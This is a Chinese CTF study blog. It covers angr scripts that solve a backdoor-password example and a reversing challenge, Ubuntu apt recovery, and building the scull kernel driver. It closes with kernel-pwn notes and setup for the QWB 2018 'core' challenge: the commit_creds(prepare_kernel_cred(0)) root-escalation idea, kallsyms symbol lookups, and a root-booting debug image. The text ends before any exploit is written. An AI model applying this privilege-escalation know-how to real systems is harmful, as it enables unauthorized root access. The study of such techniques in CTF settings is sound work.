p = angr.Project('eg1',load_options={"auto_load_libs": False})
# 这里我加上了 "load_options={"auto_load_libs": False}"
# 在load了Project之后可以用p.loader.all_objects查看所有加载器已加载的对象

# Now, we want to construct a representation of symbolic program state.
# SimState objects are what angr manipulates when it symbolically executes
# binary code.
# SimState对象也主要保存着程序运行到某一阶段的状态信息。通过这个对象可以操作某一运行状态的上下文信息
# 比如内存,寄存器等

# 可以通过Project.factory这个容器中的任何一个方法来获取SimState对象,这个factory有多个构造函数
# 如:block、entry_state等。这里使用entry_state返回一个初始化到二进制entry point的SimState对象
# The entry_state constructor generates a SimState that is a very generic
# representation of the possible program states at the program's entry
# point. entry_state 主要是做一些初始化工作,然后在程序的入口处停下
# There are more constructors, like blank_state, which constructs a
# "blank slate" state that specifies as little concrete data as possible,
# or full_init_state, which performs a slow and pedantic initialization of
# program state as it would execute through the dynamic loader.
# 其中 full_init_state 会从动态链接时开始就记录

state = p.factory.entry_state()
# state对象一般是作为 符号执行开始前创建用来为后续的执行初始化一些数据,比如栈状态,寄存器值。
# 或者在 路径探索结束后 返回一个 state 对象供用户提取需要的值或进行约束求解
# 解出到达目标分支所使用的符号量的值。

# 当然了解了符号执行的概念之后就知道为什么有时候要默认在程序入口点停下了,毕竟我们暂时要分析的是程序的执行流

# Now, in order to manage the symbolic execution process from a very high
# level, we have a SimulationManager. SimulationManager is just collections
# of states with various tags attached with a number of convenient
# interfaces for managing them.

sm = p.factory.simulation_manager(state)
# 根据state设置 Simulation Managers ,这是一个进行路径探索的对象
# Uncomment the following line to spawn an IPython shell when the program
# gets to this point so you can poke around at the four objects we just
# constructed. Use tab-autocomplete and IPython's nifty feature where if
# you stick a question mark after the name of a function or method and hit
# enter, you are shown the documentation string for it.

# import IPython; IPython.embed()

# Now, we begin execution. This will symbolically execute the program until
# we reach a branch statement for which both branches are satisfiable.

sm.run(until=lambda sm_: len(sm_.active) > 1)
# 此示例代码采用的方法是用Simulation Managers的run方法
# 执行刚好出现 2个分支时就执行完毕,也就是我们后门函数的那个if条件被触发,此时程序产生两个执行分支,随即停止

# If you look at the C code, you see that the first "if" statement that the
# program can come across is comparing the result of the strcmp with the
# backdoor password. So, we have halted execution with two states, each of
# which has taken a different arm of that conditional branch. If you drop
# an IPython shell here and examine sm.active[n].solver.constraints
# you will see the encoding of the condition that was added to the state to
# constrain it to going down this path, instead of the other one. These are
# the constraints that will eventually be passed to our constraint solver
# (z3) to produce a set of concrete inputs satisfying them.

# As a matter of fact, we'll do that now.

input_0 = sm.active[0].posix.dumps(0)
input_1 = sm.active[1].posix.dumps(0)

# We have used a utility function on the state's posix plugin to perform a
# quick and dirty concretization of the content in file descriptor zero,
# stdin. One of these strings should contain the substring "SOSNEAKY"!

# 当然这里也可以选择把所有分支都打印出来看看,代码:
# for i in range(len(pathgroup.active)):
# print "possible %d: " % i, pathgroup.active[i].state.posix.dumps(0)
# 此时dump的就是字符串str
if b'SOSNEAKY' in input_0:
return input_0
else:
return input_1

def test():
r = basic_symbolic_execution()
assert b'SOSNEAKY' in r

if __name__ == '__main__':
sys.stdout.buffer.write(basic_symbolic_execution())

# You should be able to run this script and pipe its output to fauxware and
# fauxware will authenticate you.

其中在创建Project时有这么一个点要注意一下

auto_load_libs 设置是否自动载入依赖的库,如果设置为 True 的话会自动载入依赖的库,然后分析到库函数调用时也会进入库函数,这样会增加分析的工作量,也有可能会跑挂

eg1的第二个solve代码:

1
2
3
4
5
6
7
8
proj = angr.Project('eg1')
state = proj.factory.entry_state()
while True:
succ = state.step() # 一次step记录一次执行分支的state
if len(succ.successors) == 2:#这个代码的意思也是在产生两个分支时停下,打印输出用上面代码的注释那段就好
break
state = succ.successors[0]
state1, state2 = succ.successors

这里step函数的返回值是 “an object called SimSuccessors”

当然这里写法还有很多很多,具体强烈推荐参考官方文档,还有官方API文档,本博客在文末板块会尽量更新一下CTF中碰到的用法,限于英语原因很多原文中的core conception可能本人理解会有误

博主写到这里暂时感觉最好用的函数是这几个:

1
2
3
4
5
simgr.step()#这个就是上面代码中的,一个分支一个分支的记录也好像挺好用2333

sm.explore(find=0x400591) # 这个是直接设置符号执行遍历到哪个代码块停下来,很好用

simgr.explore(find=lambda s: b"Congrats" in s.posix.dumps(1))#这个是用标准输出中输出了什么来判断,直接用起来也很无脑

此道逆向题的angr解法

中间这些state操作建议先参考文末的设置&变量用法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import angr
import claripy

p = angr.Project("./funre", load_options={"auto_load_libs": False})
f = p.factory
state = f.entry_state(addr=0x400605)  # start symbolic execution at this address
flag = claripy.BVS("flag", 8 * 32)  # symbolic flag: a BVS that is 8*32 bits wide
# The program takes no input, so place the symbolic string directly in memory.
state.memory.store(0x603055 + 0x300 + 5, flag)
# Then point the two registers at the buffer.
state.regs.rdx = 0x603055 + 0x300
state.regs.rdi = 0x603055 + 0x300 + 5

sm = f.simulation_manager(state)  # explore execution paths starting from this state

print("[+] init ok")

sm.explore(find=0x401DAE)  # run until the success address is reached
if sm.found:
    print("[+] found!")
    x = sm.found[0].solver.eval(flag, cast_to=bytes)
    print(x)
else:
    # Make a failed search visible instead of exiting silently.
    print("[-] not found")

我跑下来大概只用了一两分钟时间不到?不过貌似还能加速,这里也介绍一下加速要用到的东西

加速模块安装


注意这里安装的方法本人安装失败了…介于之前装崩python的原因就暂时不继续探究原因了,只不过好像是一个什么版本的问题,具体参考这篇文章末尾

  1. sudo apt install pypy
  2. wget https://bootstrap.pypa.io/get-pip.py
  3. sudo pypy get-pip.py

第二种方法就是在init_state时加上add_options=angr.options.unicorn

angr中碰到的一些设置&变量用法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
################## Constructing values
state.solver.BVV(1, 64)  # concrete bitvector: first argument is the value, second is the width in bits

args = claripy.BVS("args", 8 * 16)  # symbolic variable created through claripy, 8*16 bits wide

weird_nine.zero_extend(64 - 27)  # widen a bitvector; this example goes from 27 bits to 64

p.hook(addr=0x08048485, hook=hook_demo, length=2)  # install a hook: addr is where it fires, hook_demo is the function to run, length is how many instruction bytes to skip after hook_demo returns
# Hooks are covered in more detail in later notes.


################## State operations
state.regs.X  # X is the register to access; it can be assigned here, and its value is a bitvector

hex(state.solver.eval(state.regs.X))  # use eval to turn a register bitvector into an int (same for a BVS); state.solver replaces the older state.se alias

state.mem[state.regs.rsp].qword  # memory the register points at; the index passed to mem is itself a bitvector
# The result looks like: <uint64_t <BV64 0xdeadbeefdeadbeef> at 0x7fffffffffeff78>
state.solver.eval(xxx.qword.resolved)  # eval yields the concrete value for that typed view

state.memory.store(state.regs.rsp, data)
state.memory.load(state.regs.rsp, 0x40)  # any address usable as a bitvector works here, not only registers

state.posix.dumps(0)  # dump what was fed to standard input at run time


################# SimulationManager operations
sm = p.factory.simgr(state)
sm.explore(find=0x400591)
st = sm.found[0]  # found[0] is the state at that point; the state operations above can dump its stdin

st.solver.eval(args, cast_to=bytes)  # for a BVS, cast_to converts the solution to a byte string (bytes, since angr is a Python 3 library)

参考文章:https://www.secpulse.com/archives/83197.html

记录一次apt包误删后的恢复

愚人节的第一个惊喜???

昨天本来是换ubuntu16 py3环境的,先删掉了自己原生的py3,可惜脑残从网上复制命令的时候可能有一句autoremove之类的东西?我所有ubuntu原生与py3有关的apt包怕是全被删完…..当时删了600多M没在意,然后用的时候只是发现终端坏了,gedit没了,然后在终端还仅存的时候装上了gnome-terminal和gedit,现在想想都后怕,要是当时没装上还得在那个黑洞洞的Xterm里面重装

然后今天来操作的时候偶然一个什么操作触发了崩盘

image-20200401161311509

图形化界面几乎是崩了一半了,窗口也拖不动只有命令行和这个可怜的桌面上几个文件夹和我打交道(幸好终端滚动条还能用),开机可以正常开,不过此时可以看到网络是断开的:

image-20200401162339042

第一步:终端

发现Ctrl+Alt+T没反应了,不清楚具体什么原因,但是右键桌面幸好还是可以开启terminal

第二步:网络

首先我面临的问题不是命令使用不了了,正常命令我都可以使用,但是我需要的是用apt把这些包全都装回来

image-20200401162540191

直接ifconfig看的话就是这样的,下面是我的解决方案

sudo /sbin/dhclient(在这条命令之前好像还尝试启动了一些服务之类的,由于是操作到一半来记录的所以前面几条可能就没有了,不过这条是最有效的,因为使用了之后我直接就可以ping通DNS和baidu了,重启之后也是和上面显示的一样,但是直接使用这条命令的话就可以瞬间通网,神奇)

sudo service network-manager start

sudo gedit /etc/NetworkManager/NetworkManager.conf 把最后一行的false改成true,这下开机的时候就会自动有网了

第三步:开始琢磨apt包

桌面apt包

还是先sudo apt update && sudo apt upgrade

之前换源的文件倒是没事,照样可用,但是upgrade的时候有内容不能fetch,所以先进行下面的操作

sudo apt install compiz

sudo apt install unity

sudo apt install gdebi

sudo apt install ubuntu-desktop

sudo apt-get install --reinstall ubuntu-desktop(这个reinstall是照着敲的,也没多想)

这里还参考了知乎上的这篇回答

然后桌面系统就恢复正常了

重新启动一切正常,Ctrl+Alt+T也可以使用了

其他apt包(可能会长期更新)

sudo apt install libxslt-dev
sudo apt install libjpeg-dev
sudo apt install python-pip

后续

之后因为系统报错所以我还执行了这两条命令,虽然不知道有没有用

sudo service apport restart

sudo systemctl restart apport

kernel入门

编译驱动程序

hello.c


/usr/src/linux-headers-4.4.0-174/ –> 该内核源码目录
/usr/src/linux-headers-4.4.0-174-generic/ –> 该内核编译好的源码目录


切到/usr/src/linux-headers-4.4.0-174-generic路径

然后make menuconfig,我照着大致修改了一下有些没有开启的东西(乱开一通系列…)

切回我们第一个想编译的程序路径

第一个驱动程序hello.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <linux/init.h>
#include <linux/module.h>
MODULE_LICENSE("Dual BSD/GPL");

/* Module load hook: logs a greeting at KERN_ALERT level and returns 0. */
static int hello_init(void)
{
printk(KERN_ALERT "Hello, world\n");
return 0;

}

/* Module unload hook: emit a farewell at KERN_ALERT level. */
static void hello_exit(void)
{
	pr_alert("Goodbye, cruel world\n");
}

module_init(hello_init);
module_exit(hello_exit);// module_exit registers hello_exit as the function that runs when the module is removed (rmmod)

Makefile

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# To build modules outside of the kernel tree, we run "make"
# in the kernel source tree; the Makefile there then includes this
# Makefile once again.
# This conditional selects whether we are being included from the
# kernel Makefile or not.
ifeq ($(KERNELRELEASE),)

# Assume the source tree is where the running kernel was built
# You should set KERNELDIR in the environment if it's elsewhere
KERNELDIR ?= /lib/modules/$(shell uname -r)/build
# The current directory is passed to sub-makes as argument
PWD := $(shell pwd)

# NOTE: every recipe line below must start with a TAB character.
modules:
	$(MAKE) -C $(KERNELDIR) M=$(PWD) modules

modules_install:
	$(MAKE) -C $(KERNELDIR) M=$(PWD) modules_install

clean:
	rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c .tmp_versions

.PHONY: modules modules_install clean

else
# called from kernel build system: just declare what our modules are
obj-m := hello.o
endif

接着执行make

编译好了之后就可以在目录下看到hello.ko这个文件(ko是kernel object的缩写)

1584795814785

使用sudo insmod hello.ko即可加载该驱动程序(模块) //此时会调用module_init设置的设备初始化函数

lsmod |grep hello可以看到驱动被成功加载

tail /var/log/syslog可以看到最后一行是程序的init加载就输出的内容

rmmod移除模块 //此时会调用module_exit设置的设备退出函数

tail /var/log/syslog也可以看到程序fini输出的内容了

IDA界面如下

1584962662551

其中printk似乎会在字符串前面加上一个1,左边就可以看到我们的驱动有init和exit两个函数了

在dev下增加驱动文件

参考来自:https://paper.seebug.org/779/#_2

这段代码很长,不过我主要只是理解了其中一个概念:struct file_operations scull_fops是啥

当然我当时编译的时候报错了,下面这段代码要加上一个这个,还有把raw_copy_...函数前面的raw_去掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> /* printk() */
#include <linux/slab.h> /* kmalloc() */
#include <linux/fs.h> /* everything... */
#include <linux/errno.h> /* error codes */
#include <linux/types.h> /* size_t */
#include <linux/fcntl.h> /* O_ACCMODE */
#include <linux/cdev.h>
#include <asm/uaccess.h> /* copy_*_user */

MODULE_LICENSE("Dual BSD/GPL");
MODULE_AUTHOR("Hcamael");

/* Module-wide settings read by scull_init_module() and scull_trim(). */
int scull_major = 0;		/* 0 means: ask the kernel for a dynamic major number */
int scull_minor = 0;		/* first minor number of the device range */
int scull_nr_devs = 4;		/* how many scull devices are registered */
int scull_quantum = 4000;	/* per-device quantum size in bytes (each quantum is kmalloc'ed with this size) */
int scull_qset = 1000;		/* per-device number of quantum pointers in one qset array */

/* One node of a device's singly linked storage list. */
struct scull_qset {
void **data;			/* array of quantum pointers; NULL until the first write allocates it */
struct scull_qset *next;	/* following list node, or NULL at the tail */
};

/* Per-device state; filp->private_data points at one of these after open. */
struct scull_dev {
struct scull_qset *data; /* Pointer to first quantum set. */
int quantum; /* The current quantum size. */
int qset; /* The current array size. */
unsigned long size; /* Amount of data stored here. */
unsigned int access_key; /* Used by sculluid and scullpriv. */
struct mutex mutex; /* Mutual exclusion lock taken by read, write and open-for-write. */
struct cdev cdev; /* Char device structure. */
};

struct scull_dev *scull_devices; /* allocated in scull_init_module */

/*
 * Follow the list.
 *
 * Returns the n-th node of dev's qset list (0 = head). Nodes that do not
 * exist yet are allocated zero-filled along the way. Returns NULL if an
 * allocation fails; nodes linked in before the failure stay on the list.
 */
struct scull_qset *scull_follow(struct scull_dev *dev, int n)
{
	struct scull_qset *qs = dev->data;

	/* Allocate the first qset explicitly if need be. */
	if (!qs) {
		qs = dev->data = kzalloc(sizeof(*qs), GFP_KERNEL);
		if (!qs)
			return NULL;
	}

	/* Then follow the list, growing it on demand. */
	while (n--) {
		if (!qs->next) {
			qs->next = kzalloc(sizeof(*qs->next), GFP_KERNEL);
			if (!qs->next)
				return NULL;
		}
		qs = qs->next;
	}
	return qs;
}

/*
* Data management: read and write.
*/

/*
 * read() handler: copy at most one quantum's worth of data, starting at
 * *f_pos, into the user buffer.
 *
 * Returns the number of bytes copied (0 at or past end of data, or when the
 * position falls into a hole), -ERESTARTSYS if taking the mutex was
 * interrupted, or -EFAULT if the user buffer could not be written.
 */
ssize_t scull_read(struct file *filp, char __user *buf, size_t count,
		   loff_t *f_pos)
{
	struct scull_dev *dev = filp->private_data;
	struct scull_qset *dptr; /* the first listitem */
	int quantum = dev->quantum, qset = dev->qset;
	int itemsize = quantum * qset; /* how many bytes in the listitem */
	int item, s_pos, q_pos, rest;
	ssize_t retval = 0;

	if (mutex_lock_interruptible(&dev->mutex))
		return -ERESTARTSYS;
	if (*f_pos >= dev->size)
		goto out;
	if (*f_pos + count > dev->size)
		count = dev->size - *f_pos;

	/* Find listitem, qset index, and offset in the quantum */
	item = (long)*f_pos / itemsize;
	rest = (long)*f_pos % itemsize;
	s_pos = rest / quantum;
	q_pos = rest % quantum;

	/* follow the list up to the right position (defined elsewhere) */
	dptr = scull_follow(dev, item);

	if (dptr == NULL || !dptr->data || !dptr->data[s_pos])
		goto out; /* don't fill holes */

	/* read only up to the end of this quantum */
	if (count > quantum - q_pos)
		count = quantum - q_pos;

	/*
	 * copy_to_user(), not raw_copy_to_user(): the raw_ variant skips the
	 * access_ok() validation of the user pointer and does not exist on
	 * older kernels, where it fails to compile.
	 */
	if (copy_to_user(buf, dptr->data[s_pos] + q_pos, count)) {
		retval = -EFAULT;
		goto out;
	}
	*f_pos += count;
	retval = count;

out:
	mutex_unlock(&dev->mutex);
	return retval;
}

/*
 * write() handler: copy at most one quantum's worth of user data into the
 * device at *f_pos, allocating the qset array and the quantum on demand.
 *
 * Returns the number of bytes stored, -ERESTARTSYS if taking the mutex was
 * interrupted, -ENOMEM if an allocation failed, or -EFAULT if the user
 * buffer could not be read.
 */
ssize_t scull_write(struct file *filp, const char __user *buf, size_t count,
		    loff_t *f_pos)
{
	struct scull_dev *dev = filp->private_data;
	struct scull_qset *dptr;
	int quantum = dev->quantum, qset = dev->qset;
	int itemsize = quantum * qset;
	int item, s_pos, q_pos, rest;
	ssize_t retval = -ENOMEM; /* Value used in "goto out" statements. */

	if (mutex_lock_interruptible(&dev->mutex))
		return -ERESTARTSYS;

	/* Find the list item, qset index, and offset in the quantum. */
	item = (long)*f_pos / itemsize;
	rest = (long)*f_pos % itemsize;
	s_pos = rest / quantum;
	q_pos = rest % quantum;

	/* Follow the list up to the right position. */
	dptr = scull_follow(dev, item);
	if (dptr == NULL)
		goto out;
	if (!dptr->data) {
		dptr->data = kmalloc(qset * sizeof(char *), GFP_KERNEL);
		if (!dptr->data)
			goto out;
		memset(dptr->data, 0, qset * sizeof(char *));
	}
	if (!dptr->data[s_pos]) {
		dptr->data[s_pos] = kmalloc(quantum, GFP_KERNEL);
		if (!dptr->data[s_pos])
			goto out;
	}
	/* Write only up to the end of this quantum. */
	if (count > quantum - q_pos)
		count = quantum - q_pos;

	/*
	 * copy_from_user(), not raw_copy_from_user(): the raw_ variant skips
	 * the access_ok() validation of the user pointer and does not exist on
	 * older kernels, where it fails to compile.
	 */
	if (copy_from_user(dptr->data[s_pos] + q_pos, buf, count)) {
		retval = -EFAULT;
		goto out;
	}
	*f_pos += count;
	retval = count;

	/* Update the size. */
	if (dev->size < *f_pos)
		dev->size = *f_pos;

out:
	mutex_unlock(&dev->mutex);
	return retval;
}

/* Beginning of the scull device implementation. */

/*
 * Release every quantum, every qset array and every list node owned by the
 * device, then reset its size and geometry to the module-wide defaults.
 * The caller must hold the device mutex. Always returns 0.
 */
int scull_trim(struct scull_dev *dev)
{
	struct scull_qset *node = dev->data;
	int slots = dev->qset; /* "dev" is not-null */

	while (node) {
		struct scull_qset *following;

		if (node->data) {
			int idx = 0;

			while (idx < slots) {
				kfree(node->data[idx]);
				idx++;
			}
			kfree(node->data);
			node->data = NULL;
		}
		/* Remember the successor before the node itself is freed. */
		following = node->next;
		kfree(node);
		node = following;
	}

	dev->data = NULL;
	dev->size = 0;
	dev->qset = scull_qset;
	dev->quantum = scull_quantum;
	return 0;
}

/* release() handler: nothing to free, only log which process closed which minor. */
int scull_release(struct inode *inode, struct file *filp)
{
	unsigned int minor = iminor(inode);

	printk(KERN_DEBUG "process %i (%s) success release minor(%u) file\n",
	       current->pid, current->comm, minor);
	return 0;
}

/*
* Open and close
*/

/*
 * open() handler: look up the scull_dev that embeds this inode's cdev and
 * stash it in filp->private_data for the other file operations. A
 * write-only open empties the device first.
 *
 * Returns 0, or -ERESTARTSYS if taking the mutex was interrupted.
 */
int scull_open(struct inode *inode, struct file *filp)
{
	struct scull_dev *sdev = container_of(inode->i_cdev, struct scull_dev, cdev);
	int write_only = (filp->f_flags & O_ACCMODE) == O_WRONLY;

	filp->private_data = sdev; /* for other methods */

	if (write_only) {
		/* Opened write-only: trim the device to a length of 0. */
		if (mutex_lock_interruptible(&sdev->mutex))
			return -ERESTARTSYS;
		scull_trim(sdev); /* Ignore errors. */
		mutex_unlock(&sdev->mutex);
	}

	printk(KERN_DEBUG "process %i (%s) success open minor(%u) file\n",
	       current->pid, current->comm, iminor(inode));
	return 0;
}

/*
* The "extended" operations -- only seek.
*/

/*
 * llseek() handler: compute the new file position from whence
 * (0 = from start, 1 = from current position, 2 = from end of data).
 *
 * Returns the new position, or -EINVAL for an unknown whence or a
 * negative result.
 */
loff_t scull_llseek(struct file *filp, loff_t off, int whence)
{
	struct scull_dev *dev = filp->private_data;
	loff_t target;

	if (whence == 0)		/* SEEK_SET */
		target = off;
	else if (whence == 1)		/* SEEK_CUR */
		target = filp->f_pos + off;
	else if (whence == 2)		/* SEEK_END */
		target = dev->size + off;
	else				/* can't happen */
		return -EINVAL;

	if (target < 0)
		return -EINVAL;

	filp->f_pos = target;
	return target;
}

/*
 * File operations exported by every scull device. Members not listed here
 * (for example unlocked_ioctl, which is not implemented) stay NULL.
 */
struct file_operations scull_fops = {
	.owner   = THIS_MODULE,
	.open    = scull_open,
	.release = scull_release,
	.llseek  = scull_llseek,
	.read    = scull_read,
	.write   = scull_write,
};

/*
* Set up the char_dev structure for this device.
*/
static void scull_setup_cdev(struct scull_dev *dev, int index)
{
int err, devno = MKDEV(scull_major, scull_minor + index);

cdev_init(&dev->cdev, &scull_fops);
dev->cdev.owner = THIS_MODULE;
dev->cdev.ops = &scull_fops;
err = cdev_add (&dev->cdev, devno, 1);
/* Fail gracefully if need be. */
if (err)
printk(KERN_NOTICE "Error %d adding scull%d", err, index);
else
printk(KERN_INFO "scull: %d add success\n", index);
}


void scull_cleanup_module(void)
{
int i;
dev_t devno = MKDEV(scull_major, scull_minor);

/* Get rid of our char dev entries. */
if (scull_devices) {
for (i = 0; i < scull_nr_devs; i++) {
scull_trim(scull_devices + i);
cdev_del(&scull_devices[i].cdev);
}
kfree(scull_devices);
}

/* cleanup_module is never called if registering failed. */
unregister_chrdev_region(devno, scull_nr_devs);
printk(KERN_INFO "scull: cleanup success\n");
}


int scull_init_module(void)
{
int result, i;
dev_t dev = 0;

/*
* Get a range of minor numbers to work with, asking for a dynamic major
* unless directed otherwise at load time.
*/
if (scull_major) {
dev = MKDEV(scull_major, scull_minor);
result = register_chrdev_region(dev, scull_nr_devs, "scull");
} else {
result = alloc_chrdev_region(&dev, scull_minor, scull_nr_devs, "scull");
scull_major = MAJOR(dev);
}
if (result < 0) {
printk(KERN_WARNING "scull: can't get major %d\n", scull_major);
return result;
} else {
printk(KERN_INFO "scull: get major %d success\n", scull_major);
}

/*
* Allocate the devices. This must be dynamic as the device number can
* be specified at load time.
*/
scull_devices = kmalloc(scull_nr_devs * sizeof(struct scull_dev), GFP_KERNEL);
if (!scull_devices) {
result = -ENOMEM;
goto fail;
}
memset(scull_devices, 0, scull_nr_devs * sizeof(struct scull_dev));

/* Initialize each device. */
for (i = 0; i < scull_nr_devs; i++) {
scull_devices[i].quantum = scull_quantum;
scull_devices[i].qset = scull_qset;
mutex_init(&scull_devices[i].mutex);
scull_setup_cdev(&scull_devices[i], i);
}

return 0; /* succeed */

fail:
scull_cleanup_module();
return result;
}

/* Register the functions run at module load (insmod) and unload (rmmod). */
module_init(scull_init_module);
module_exit(scull_cleanup_module);

makefile:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

ifneq ($(KERNELRELEASE),)

# Included by the kernel build system: only name the module object.
obj-m := file_operations.o

else

# Run directly: re-invoke make inside the kernel build tree.
KERN_DIR ?= /usr/src/linux-headers-$(shell uname -r)/
PWD := $(shell pwd)

# NOTE: every recipe line must start with a TAB character.
default:
	$(MAKE) -C $(KERN_DIR) M=$(PWD) modules

endif


clean:
	rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c .tmp_versions

.PHONY: default clean

IDA界面如下

1584963141639

可以看到这边是一系列的对应的操作函数


驱动提供的接口是/dev/xxx,在Linux下Everything is File,所以对驱动设备的操作其实就是对文件的操作,所以一个驱动就是用来定义打开/读/写/……一个/dev/xxx将会发生啥,驱动提供的API(fops中指定的)也就是一系列的文件操作

struct file_operations scull_fops结构体中实现了的函数就会静态初始化上函数地址,而未实现的函数,值为NULL

结构体中实现的几个call,冒号右侧的函数名是由开发者自己起的,在驱动程序载入内核后,其他用户程序程序就可以借助文件方式像进行系统调用一样调用这些函数实现所需功能。

这里是一些已知的常见对应操作:

1
2
3
4
5
6
Events		User functions		Kernel functions
Load insmod module_init()
Open fopen file_operations: open
Read fread file_operations: read
Write fwrite file_operations: write
Close fclose file_operations: release

这里还有一些知识点,比如驱动分类,主次编号,什么的,我写的这些主要也是参考了这篇文章


之后insmod,此时虽然驱动已经加载成功了(dmesg可以看到驱动主编号是246,分别用四个次编号标记了4个设备,4个是怎么来的看上面代码就知道了)

1584964191239

但是此时并不会在/dev目录下创建设备文件,需要我们手动使用mknod进行设备链接

1584964631604

此时还可以指定设备类型,然后删除就直接使用rm就好了

这里记一下命令:
dmesg可以查看syslog
cat /proc/devices 中查看设备的类型(左边是主设备号,右边的是设备名)
mknod 设备名 设备类型(字符:c,块:b) 主设备号 从设备号

rmmod之后dmesg还可以看到一条scull: cleanup success

kernel pwn基础知识

这篇文章,中有这么一句话

如果驱动在init中执行了proc_create(“core”, 0x1B6LL, 0LL, &core_fops),文件名是“core”,而且在回调中实现了ioctl,那么其他用户程序就可以先fopen这个core获取文件指针fd,然后执行ioctl(fd,<参数>,<参数>)来进行具体操作,其他的fop中的回调接口函数也类似。

然后我就去看了ioctl是什么:


ioctl(input/output control)是一个专用于设备输入输出操作的系统调用,该调用传入一个跟设备有关的请求码,系统调用的功能完全取决于请求码

ioctl是设备驱动程序中对设备的I/O通道进行管理的函数。所谓对I/O通道进行管理,就是对设备的一些特性进行控制,例如串口的传输波特率、马达的转速等等。它的调用格式如下:

1
int ioctl(int fd, int cmd, …);

其中fd是用户程序打开设备时使用open函数返回的文件标示符,cmd是用户程序对设备的控制命令,至于后面的省略号,那是一些补充参数,一般最多一个,这个参数的有无和cmd的意义相关。

ioctl函数是文件结构中的一个属性分量,就是说如果你的驱动程序提供了对ioctl的支持,用户就可以在用户程序中使用ioctl函数来控制设备的I/O通道。


差不多就是我们与驱动设备交互的一个函数吧,一般前两个参数是fd还有控制码,然后还有一句话

一个进程的在用户态和内核态是对应了完全不搭边儿的两个栈的,用户栈和内核栈既然相互隔离,在系统调用或者调用驱动、内核模块函数时就不能通过栈传参了,而要通过寄存器,像拷贝这样的操作也要借助具体的函数:copy_to_user/copy_from_user

就是说内核栈和用户栈是相互隔离的,然后通过寄存器传参

然后进入kernel态一般有如下情况:

  1. 系统调用

  2. 产生异常

  3. 外设产生中断

    等等

至于提权的话就是这些了:由于这些内核模块运行时的权限是root权限,因此我们将有机会借此拿到root权限的shell,流程上就是C程序exp调用内核模块利用其漏洞提权,只是提权后要“着陆”回用户态拿shell。提权代码是commit_creds(prepare_kernel_cred(0))

进入kernel态进行的操作

保存用户态的各个寄存器,以及执行到代码的位置

从kernel态返回用户态进行的操作

执行swapgs 和 iret 指令

一般的攻击思路

1584965699729


记一下命令:

查看所开保护cat /proc/cpuinfo
查看内核堆块 cat /proc/slabinfo
查看prepare_kernel_cred和commit_creds地址
grep prepare_kernel_cred /proc/kallsyms
grep commit_creds /proc/kallsyms


实操linux kernel ROP

强网杯2018-core

下载下来压缩文件之后看到有这几个文件:

1584966164347

其中对应的文件意思如下(来自星盟公开课的截图):

1584966068272

其中bzImage是打包的内核代码,可以用来寻找gadget

这里写一下师傅们的注意事项:

注意,vmlinux是未经压缩的,然而在core.cpio里面也有一个vmlinux,里面那个是起系统后真正的vmlinux,按理说这俩应该是一样的,单独拿出来是为了你方便分析,但是笔者亲测的时候发现这俩竟然不一样,可能是下载的时候弄错了?如果读者也遇到相同情况,不要用外面那个,一定要用core.cpio里面那个

start.sh中有以下内容

1
2
3
4
5
6
7
8
# "kaslr" on the kernel command line enables KASLR.
# Comments must not follow a line-continuation backslash, so they live up here.
qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic

我们可以自己再做一份rootstart.sh还有一个root.cpio,主要是用来调试

其中在sh文件最后加上gdb调试的选项:-gdb tcp::1234
还有比如关掉kaslr

新制作的root.cpio中则需要修改以下几点:

  1. cpio包中的init文件,里面有一行poweroff,是到时间自动关机的命令,可以取消掉
  2. 同样是init文件,setsid /bin/cttyhack setuidgid 1000 /bin/sh改成0000,这样就可以以root身份启动了

ps:这里就是整个系统的配置,如果发现有什么配置有问题的话说不定就非预期解了….然后系统初始化操作没有写在这里的话看看/etc/init.d/rcS,有时候初始化配置会写在这里

新制作的rootstart.sh就是这样:

1
2
3
4
5
6
7
8
9
# Debug variant: boots the repacked root.cpio with KASLR disabled ("nokaslr").
# Comments must not follow a line-continuation backslash, so they live up here.
# The last option opens the gdb debug port; note that -s is already shorthand
# for "-gdb tcp::1234", which makes that last line redundant.
qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd ./root.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
-gdb tcp::1234

启动踩坑

然后启动….

但是启动的时候我疯狂踩坑,被坑了很久很久

